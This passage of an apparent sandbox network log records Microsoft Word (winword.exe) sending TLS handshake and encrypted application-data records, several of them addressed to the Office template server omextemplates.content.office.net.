318. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe2\\xe7\\xdf\\xca2'\\xd3\\x98\\x85j\\xaa\\xb7\\x18\\x9c\\xd3\\xf2\\x99\\x8b0\\xfa\\xc5\\xb0i\\x85\\xec\\x97\\x0b\\xbd\t\\xb7!\\xe1\\x08b\\xae\\xec/\\xb7\\xca\\xc5\\xd2|b\\x1bq\\xcf\\xd0\\xc0\\xe5!\\x19\\xa1\\x93 \\x9e\\xaa\\xf9\\x820#\\xa2\\xce\\x05\\xed\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x03\\xc9@\\xa0\\xf7-y\\xc7\\x07\\x94w$3\\x96\\xe4\\xda\\x99\\xa3\\xf4%pz;~b\\xe6\\xb4\\xf2\\xb6\\x81x\\xea\\xf3)\\x9ct\\xf8\\x04)+\\x8f\\x86\\xd5\\xbf3he\\xf1"
319.  
320.  
321. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04e\\xde\\xff\\xf0\\x9f\\xb3\\xf9?r\\x14\\xb2.\\\\xd8\\xcf\\xfa\\x01\\x99\\x0c\\x12\\x18p_\\xd9\\x8a\\x17\\x81\\xb2\\xce\\xe5\\x83d\\x87\\x9c\\xa0\\xe5jn4\\x7f\\xd7\\xfb\\x95g\\x10\\xafe\\x8c*\\xc6\\x8b\\xdc/2;m\\x03\\x0b\\x12\\x80\\xbb\\xcap\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000-\\x14\\xfac\\xc1?\\x11\\x1a\\xde\\x05l\\xf0<\\x9a*k(\\\\xa9\r\\xb1\\xfc\\xa8\\x01\\xb6o\t\\xc8\n\\x92(\\xab\\xf5\\xdd\\x04\\xc3y=t\\x7f\\x1b\\xf2z\\xc1\\xee\\x1f\\xea\\xee"
322.  
323.  
324. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x1bpt&>\\x18\\x83\\x19\\x12o\\xfcy\\x07\n\\xc9\\xe3\\xb8%\\xe2\\x9a\\xf5$^\\xa8\\xacco1\\xff\\xad\\xe18\\xd9\\xde\\x8c\\xd5j\\x82\\x00\\xf9\\xb1\\x8d\\x0e;\\xf1!\\xd2tj\\xe7|b\\x92x\\xae\\x89\\xd8\\xe3uo\\x85\\x98pz\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x11\\x94\\x11\\x1c\\xbb\\x88\\xca,\\x1e\\xe8&\\xb6\\x8d\\x8d\\xee^s\\xe8g$\\x82\r\\xcat\\xd4u\\xad3ni\\xa5g=\\x00\"\\x96m\\x13g\\xf3\\x9dx\\xd10\\xd7\\xc2\\xb2\\xdd"
325.  
326.  
327. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92 \\xcf\\x93\\x0c\\x80\\xd2\\xd0\\xea+(^u\\\\xc0\\xaa\\xa3s\\xc0\\xad\\xac\\x01%g\\xb51r\\xef*\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
328.  
329.  
330. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92j%\\x1d\\xcf1\\x1fh\\xfa$\\x93\\xb4\\xfb9\\xfa\\xaa3\\xbd\\x08\\xcfb\\x8a)\\xb9x\\x99\\x94\\x94\\xdb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
331.  
332.  
333. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92f\\x85,<\\x99m\\x1d\\x8b\\x1b\\xd9\\xc3\\xeae\\x15\\x0f\\x06\\x8b0\\xddv\\xc2\\\\xb9\\x91'\\xe8\\x9b\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
334.  
335.  
336. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x17\\xcb\\xd5o\\xf7\\x05\\xfc\\xd9\\xb74)\\x89zwk\\xcf\\x14$\\xd9s8e\\xf0\\xbem+o\\xf4\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
337.  
338.  
339. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xe4\\xc3\\xcd\\x1e|\\xfa\\xb2\\xd3\\xca\\x1a\\xe7\\xaeo_w\\x9b0\\xb3\\x8c\\xb3\n\\xbc\\x7fdp\\x8d\\xf8\\x8c\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
340.  
341.  
342. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xd5j\\xd2\\x12\\x00p\\x85\\x93w\\x0f\\xbd\\x93\\xc2\\xf2w\\xbbyl\\x0b\\xa1\\xeb7 (\\xfe\\x8f\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
343.  
344.  
345. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xab>\\x97\\xad:b\\xb0.\\x02#\\x87b\\xbe\\xc1\\xa6f\\xc6p\\x9b\\x89r\\xd3\\xd0v\\xc6\t\\xc9\\xc6\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
346.  
347.  
348. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x966\\x11\\xc4\\xdf\\xaf\\xa4l\nh\\xf1\\xe7\\x85\\x17\\xed\\xf7n\\xe8\\x80y\\x9d\\x0e\\xa7\\x81h\\xc2\\xe5\\x94\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
349.  
350.  
351. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x10y\\xa3\\xd0\\xc4\\x91\\x90q\\xeb\\x8c\\x8d\\xf3\\x8d f\"\\x0f\\x9epn\\x0e\\xf1\\xebf\\xac\\x89\\x0e\\xec\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
352.  
353.  
354. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xe9q\\x08c&-\\x08\\x8c#\\x02\\x05\\x7fv\\xcd\\xfd\\xc3\\x00\\x15\\xb5f!\\xa7!\\xe7\\x85\\x8e\\xb1\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
355.  
356.  
357. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x02\t\n\\x00\\x11\\xf8\\x06\\xeay\t6\\xee$f,\\xc8\\xb2\rk\\xcf\\xbf\\x96\\xa5\\x00\\xf3\\xfe\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
358.  
359.  
360. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xbfr\\xf0\\x8b\\x01\\xe0\\x1c8y\\xd8\\xd4\\xaev\\x8c\\x8d\\xf3\\xac\\xe3s\\xd3\\x98kq\\xb9u\\x02b\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
361.  
362.  
363. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x05al\\xc44s\\x1a\\xe3\\xa5\\xad\\xf1\nlyl\\xa5\\x9f%\\x83\\xdb\\xe3\\xf0\\xe7\\xc4w\\xcc)k\\xb6\\xb9lt\\x858\\xa2\\x96\\x15\\xc5@\\x9dr\"f\\xa5n\\xbe\\xed\\xed6\\x9afah\\xc6\\x90\\xfe\\xbc\"\\xb0#\\x85\\xf1eu\\xa0w\\xf8\\xcf\\xb1\\x8co\\xf4\\xe3\\x0b\\xef\\xf5\\xce\\x80\\xda\\x1eb\\x9c\\xfa\\xbd\\xb3\\xfd\\x9d\\xfc\\xac\\xa9\\xaa\\xa9t\\xea\\xb9\\x01\\x08\r\\x98\\x0b\\xbf\\x91\\xb8\\x8a\n\\x80\\xdb\\xf1\\x89\\xd4k\\x12\\xe1\\x96\\xd8\\x19j\\x17,\\x99\\xa1\\x8a\\xbe\nu\\x10\\x16\\xf5\\xaae\\xe4_\\xe7j\\x1d\\x7f\\xfef%t\\x8e\\x99\\x16.\\xd3\\xad\\xb7\\x97\\x1bd6b\\xa3\\xfai\\xa7\\xef\\xf5\\x04p(h\\xac\\xdfm\\xf0(^\\x98&\\xdc\\xf4ips\\x0c$\\x1f\\xecl9n\\xcd.n\\xb9\\xb3\\x1f\\x196\\xfd\\x8e\\xd1w*\\x9d\\xa7c\\xda\\x04\\xb0\\xec\\x9a\\x04w\\x88y\\x9epo\\x88\\xc5\\xe5*\\x97\\x0b=\\x93\\xfa'\\x0c\\x97o\\xa4c6t\\x00\\x1a\r\\x96\\x0c\\x95\\x01\\x93\\x81p\\x06\\xd56\\xf5\\xcf\"\\x12"
364.  
365.  
366. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xa6/\\xb3u\\xb8\\x86\\x17\\x82$a+\\xe3\\x1ehz3\\x9f\\xd4\\x0f\\xe6\t3\\x11\\xe4\\x8b\\xd5\\xc7\\xc9\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
367.  
368.  
369. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xccs\\xfd\\x859\\xa5\\xfd\\x07\\xcc\\xc2\\xe6i\\x19\\xde\\xedk\\xdc\\xd3\\xd4\\xf2'\\xc7\\xac\\x17\\xf6k\\xd9\\xfc\\xfer^\\xb5\\x0f\\xbd\\xc1,\\x87\\xfcm%i4m\\x1do\\xf6\\x9d\\xe8 \\x0b\\xc1\n\\xc5$\\xf6\\xdb\\xff|#+\\xf4\\xfc|3\\x1av\\xc8h\\xe8\\xee\\x18\\xd4\\xf2-j9\\x12.\\x9f9\\xd4\\xc4z\\x14\\x03\\xb1\\xcc!\\x84\\xd4c\\xb1\\xeb#\\xdbf\\x93\\xf7\\x07\\x00\\xbae\\xf3\\xc1\\xb6u:7\\xe4%\\xf0_\\xda\\xfd2\\x96\\xc0m\\xd0\\xe2\\xd6\\x91\\xe4\\xd9\\x99\\xf8\\x11g\\xe0\t@\\xbaj4\\xc5\\xefz\\x9d\\xbe\\xae\\xd5i97\\x17\\x11z\\x815!d\\xc5\\x87\\xe5\\xa7rg\\xed\\x17\\xec\n=?\\xdf\\x1c\\x1bb\\x95\\x97q\\x8a\\xe2\\xc4vd\\xa0pt\\x1fgx\\xachb\\xa4s`\\x9d\\xc6\\x1b\\xb2\\xf9\\x04t;`\\xc5\\xb07\\xf0\\x08w\\xd5w6\\xfd\\xef\\x0cy\\x90$\\x8a\\xc2c\\xb7\\xaeqd\\xaeg\\x90\\xb1\\xc1\\x86\\xd9\\x0c\\xb1\\xa0&\\x1f8\\xfe\\x8fn \\xc7\\xa4ub\\xab\\xcec\\x8a-\\xf6\\x82"
370.  
371.  
372. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xee\\xf3\\xf7,\\xc8\\xb1$\\xe5\\xc6\\xefj\\xf5\\xb8\\x95\\xa0\\=.\\xfe\\x9e\\x85z\\xa7\\x845\\x9d\\xf6\\x88tw\\xa1n\\\\xde&.\\x7fh?\r\\xf5\\xd2\\xc2\\x90\\x12u\\xd6\\x0c\\xc3\\x81\\x0b\\xba\\x81\\xea\\x7fx$\\x82\\xeajp\\x04\\x05\\xc9\\xc6u\\xb7\\xe1yr\\xb3\\x9d0c\\xa1\\xd2\\xe0\\xde\\x87b\\xa8r\\xa6\\x98q\\x88\\x1e\\x06\\xc9\\xbbc\\xb4k\\xbfv\\x8c\\xec\\xc1\\xfd\\x82\\xcaw\\x86\\xf4\\xd5\\x0c\\x87w\\x92\\x8a\\x86\\xbb\\xd8i\\xad\\xba\t\\xa9\\x1ek\\x19=\\x039=w\\xa9\\x18\\x0f\\x88\\xd9vh\\xc3\\xcd\\xf3\\xf9f\\xf2u\\x9d\\x198d9\\x7f\\x17\\x8c\\xd6\\xca\\xdc\\xa5+\\xd7\\xa4\\x12:e\\x8d\\xf3\\xa5\\x122k\\xa9\\x89\n\\xf5\\xbd\\x08\\xcc\r.k\\x7f\\x12u\\x7f\\xacu\\xbe\\xb9\\x02ek\\x92\\xe5\\xf0\\xd4b\\xb8\\xb0y\\xa0`3\\xadf3\\x97\\xef'\\xd6p\\xfd\\xc6r\\xfa\\xfe\\x93@\\xad\\xd2r\\x0c\\xd1\\x9f\t\\x91oo=\\xea\\xc5\\xaa\\x99vp\\xe1\\xf3\\xb3\\x1cvw/\\x91\\xfcnx\\xb6\\xc5#\\x06#\\x84v\\x11"
373.  
374.  
375. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb1\\x89\\x85\\xc6\\x9a\\xad\\xbcle\\x03%\\xc0j\\xd5n\\xad\\xa0\\x15\\xb7\\x83x\\x971\\xf8\\x9c\\xef\\xac\\x05\\xf8\\x979\\xe1\\x80m\\xcfw\\x1a\\x94_\\xfe!a\\xb1j\\xc8a2\\x9f\\xe7ld\\x05\\x80\\xaf!/\\xe8\\xd2^\\xf4\\xbb\\x8d\\x01\\xf9m q\\x0bg\\xcf\\xa4\\xa5*\\xc0wb\\x00x\\xb5\\xc5\\xf0\\xeb/\\xf6\\xd4\\x00-qcb\n\\x92l\\\\xec\\xf1\\x9a\\xcavz\\xf8\\xeb.k&\\x9e\\xf6\\xca\\x17\\xcc\\x8c\\xb5:-\\xbf\\xe3\\x17\\x88\\x19\\xcb7\\xfal\\x95~\\x1bp\\x0e\\x86\\xa7\\xd3\\xe0\\xd5bv\\x81\\xc2\\xa2\\x01*\\x7f\\xfb\\xdb\\xc4\\xa9\\x80\\xecs8\rl\\xca\r\\x95\\xe3\\xe8?\\xaf\\xe3\\xbc\\x95\\x06\\xc8i\\xf5\\x04\\xe3<s\\xf7\\x97\\x10f\\x95\\xef\\xa4\\xbf\\xd6\\xe5?*\\x00af\\x8b\\xbb\\xeb%\\x0e%\\xbb\\xb5e\\x9e^\\x8cw\\x07\\xfe\\xcck\\xfca2\\xb43\\x88\\xfc\\xdc\\xa8h\\x1a\\x05rb\\x80\\x1bk\\xf4\\xffl\\x1e\\x8b\\xf0\\xb9\\xb9\\xd2\\xdbr\r\\x9a\\xe2k\\xdd=7\\x91\\xe7\\x1b\\x9f\\xb3\\xd6\\xf4k\\x19\\xc0\\xf1\\xb1\\xfb"
376.  
377.  
378. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010t\\xa7\\x96\r\\xcf|o\\xc9b<\\xdd\\xdf\\xba\\xe7\\xbem>d\\xcc\\x13\\x9f\\xa1\\xe2\\x8fp\\xd2c58\\xd0\\x886j5 \\xc1w\\xb1'i\\xd6\\x06\\xa8\\xe5da\t\\xa1\\x85mx5\\xfb\\x1a\\xeax\\xbbe\\xf7\\x8c\\xd4\\xaa\\x14\\x8e=\\xefn\\xe0\\xb8\\xc3\\x9c\\xc1\\x86\\x02\\x9e\\xa5\\xab\\xff\\x1d\\x15\\x00\\xd0\\xd0\\xb19x\\x19\\xe7\\x95\\xcd\\x85\\x82\\x87\\xc0\\x0cx\\xdft\r\\xf5b\\xf8\\xd6r\\xee\\xber\\x83f\\xae\\xd0\\xcd\\xe7c\\x7f\\x0e\\xf2\\xe6tj\\x8az0\\xd3\\xd0g\\xd2\\x83*\\xda\\xd7\\xdd\\xc8@i\\xeb\\x06\\x0e'\\x91\\x03\\xce vg\\xa16\\x8e\\x17\\xce&iq\\xc2\\xde\\xeaz\\xbfd<&\\xe0\\x9d\\xb2:^\\x84\\x16r\\x07\\xbe\\x9b\\xe9\\xa6\\xd5\\x8c\\xba\\xe8\\x9a\\xff\\x97\\xa1o-\\xa2\\xe7\\xf5\\xe0\\xe9\\x8a\\xedy\\x89\\xf1q6\\x00\\x0b#fc\\xf2\\xa6+*%\\xc4\\x93\\xb15\\x11\\xc0>\\xc21\\xa6z\\\\xd1\\x16\\x8c+'\\xfcnq\\x8d\"\\xe1\\x98\\x12\\x83c\\xdd\\xad\\x832\\xf2n\\xa4e\\xcc\\x9b\\xfd\\xaa\\x9f\\xdf"
379.  
380.  
381. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010*\\xa1\\xdb\\x97\\x91\\xc3(c\\x9f\\xd8\\xe1iyr5\\x18\\xbdi\\xe1\\x86\\x00\\x9f\\xad\\xab\\xea\\x15\\x9d\\x85lc\\x8d\\x1e\\x81\\xa1\\xac;\\x98\\xf1`\\x1e\\x1fz\\xf3\\x15\\x7f?\\xeb#\\xfb\\x0b\\x9f\\xc0\\xefv\\xd3\\xd93\\xe2\\xa5d\\x89\\x82\\xd7w\\xc6<,-e\\x86\\xba\\xc0&\\xa4ih\\xbe\\xdb\\x0f\\xdc\\xf7\\xdb \\x06\\x1c\"h\\x82+\\xac\\xbe\\xe7\\x91\\xcax\\xfe\\xb4\\x8ag\\xa9\\xcf\\x9fl.\\xa6\\xe5\\xc3\\xdab\\x142\r\\xd4\\xd2\\xa1$,\\x9e\\xe8\\xa5b\\x1c\\x0e\\x80g\\xd4\\xe7%\\xee\\xa75l4f\\x81\\xe1\\x87\\xee6v\\xe0\\xd6\\xfe\\x06\\x07\\xde,\\xf6\\xfa\\xebv(\\xbc>db\\x19\\xf2e\\xa4\\x89x\\xfe\\xc30\\x02l\\xbb\\xfb\\xcar\\xe0\\xa0\\xcbg\\xff\\x02etz n\\xc2\\x85\\xc4\t\\x0e\\xa8\\xce\\xa5z\\x943\\x97\\xf4\\xa6?z\\x01\\x9d\\x0b\\xa1\\x9c_\\xaf\\xb1\\x19_\\x14w\\x05\\xd4\\x9e)\\x86\\xae\\xc4\\x8c\\xec\"\\xb8\\x9d\\xafo\\xf5\\xf8\\xb9\"d\\x07,p\\xe6\\x9d\\x10\\xaez\\x8a\\xdc\\xbc\\xfe\\x16\\x11\\xab\\xe6\\xfa"
382.  
383.  
384. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04sr\\x94\\xee7\\xc2\\x0f\\xc5h\\x86\\xb2\\x95!\\xe8\\x9f$\\x99\\xca\\x99\\xeb\\x08\\x91*\\xc1\\xf9\\xf1\\xebu=t\\x9a\\x19\\xec\\x92t\\xee\\x88\\xbc\\x97i\\xf3$\\xd2/\\xc1\\xc6yy\\xdf\\xd5uj\\x02rl\n\\xe6\\x85\\xd5\\xa6\\xa9\\xc7\\x8d\\xed\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000s\tm\\xd60\\x06\\x93\\x0e\\xc6\\x0f\\x91\\x84\\x86\\xce\\xbc\\xa5\\xe9\\xbd\\xcb\\xc1!\\xaa\\xf7\\xca\\xf7\\xb8\\xc0o\\xe1o\\x98w(w\\xb5\\x0e\\xa7\\xb4=x\\x99\\xc1\\xf1m\\xa1\\xb0\\+"
385.  
386.  
387. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xca\\x98\\x13\\x03\\xd3c\\xe0\\x8d\\x1c\\\\x86\\x0f\\x8a\\xa7\\x02\\x82\\xba\\xef4qa\\xbb\\xcf\\x1c\\xec\\x9cu\\xbeq\\\\xfe\\xc8\\x12 \\x9b\\xd7\\xb8e7\\xcc\\x8c.\\x0c|te\\xc9\\x05\\xc9\\x94'v\\xea\\xef.\\x88\\xd7\\x8d\\x9alx\\xf7\\xd7\\xdd\\xc8\\xa8\\xa9\\xf0i\\x8c\\x11\\x0c\\xc66i\\x1d\\xad\\x7f\n\\xca\\x92\\x93\\xe2\\xafi\\xaf\\x1d.o\\xa92\\x8e\\x1b'e\\x987\\x18\\xdc\\xc4\\x95\\xa0\\xa3c\\xc5\\xa0\\x1f\\xb9i\\xde\\xd5br\\xc3\\x8d\\x02\\x9f\\xa2\\xeady\\x13\\xff\\x1f\\x91\\x92\\x0f(\\x12\\x82w2\\xaa\\x94\\xbep\\xb0r\\xe6\\x03\\x8ah9\\x1e\\x87\\x03p\\x9cik\\x164\\x82.\\x90&\\xdc\r\\xe0\\xe4\\xcbja\\x9a\\xd1\\xb6&5\\x1e\\xff\\xd3\\xc0gf%x\\xba\\x9f\\xc3\\xb4bh~c\\x83\\x0e;\\x00\\xa9q\\xaa9\\x91\\x9a\\x9b\\x9c\\xd9\\xa5a\\xa3s\\x12\\xd3$\\*\\xff\\xaa\\xcd1k\\xf2r\\x96\\x1d2\\x8e\\xff\\xaas\\x966\\xb8\\xcd\\xd6%\\xe4\\xce@\\xc4\\x9e\\x02\\xe2\\x92\\x84\\x95e!cz\\x82f\\x00\\xd5\\x9cx"
388.  
389.  
390. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x1fx7\\xa7\\xb9\\x1dx\n;\\xf6\\x14h\\xfen\\xe5\\x941w\\xa78\\x0b\\xc2\\x86k\\x023i!\\xcda\\x85\\\\x96\\x8c|2\\x1a\\xf8\\xc7\\xad-r\\xdc\\xd9\\xc52\\x179\\xe2\\xe9\\x105z\\x8b\\xce\\x8e\\x1c\\xb1\\xc5w\\xcc\\xa83\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc7y\\xf7\\xee\\x05_wv\\xdad0cq\\xf25\\xab02\\xa8\\x1e\\x8c\\x1a\\xec\\xa0\\xa1mp'n\\xfd\\xa3\\x10(d\\x1cv\\x04\\x88\\xda\\x18\\x9b\\xf8\\xdf\\xc9z\\xe3\\xe8\\x11"
391.  
392.  
393. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x97\\x87\\xbc#ak\\xf7\\\\xeb\\x97\\x16~\\\\xb9\\xfc:`\\xb1\\xaa\\x9c\\xc0\\xcf%\\x01\\x8eva\\x0c\\xd9q\\xb5\\x91\\xb6\\x04l\\x15b$\\x04c\\xdc\\x1b\\xef\\xacc\\xfdmj\\x062c\\xfa\\xe9\\xd6m\\xad\\xf1\\xe1\\x06l\\x01\\x98\\xc8\\xd7h4w\\x12o\\xbc\\xd3o\\xa5uwp\\x8f\\xcb\\xf4\\xf8\\xfdy\\x11v\\xd3\\xec\\xf2\\x9d\r\\x0b\\x0f\\x1a~\\x1a\\x04\\x88\\xd8\\xfa\\x05s-y\\xcd\\xf0k\\xe1\\x04'\n\\xaf\\x0f\\x86u.\\x96\\xb4al\\x90\\xde\\xcf-\\xbd\\x16\\xa6\\xb5\\xd4\\xb0\\xfc\\xfbzr\\x12)\\x8b$k\\xe5-m\\xe4l\\x8d\\xad\\xb7>3\\xf2\\xa2\\x8c\\x87.d\\xdc\\xfc\\x08\\xcf\\x98\\xd0.\\x97\\xb4\\xab\\x16\\xf9\\xe0\\x86\\xc7q\\x15\\x80m\\xe9\\x83\\xbfj\\x98\\x00n\\xd1\\xde\\x97\\x07\\xbd\\x1c\\x06\\xe9l\\xe7\\xd1\\xb6#\\xdbo+\\x07\\x95k\\xda\\xe1y9\\x80\\xc1\\xack\\xb0\\xb5>\\xb23\t\\xe9~\\xabg%\\xc4m\\xbey\\xd9\\xe9)\\xc7\\xe6\\x95\\x96\\xf9x\\xdc|\\x98\\xd0\\xeez\\x05.\\xf7b1\\xe3\\x9e\\x1cp\\xf6\\xce\\x83"
394.  
395.  
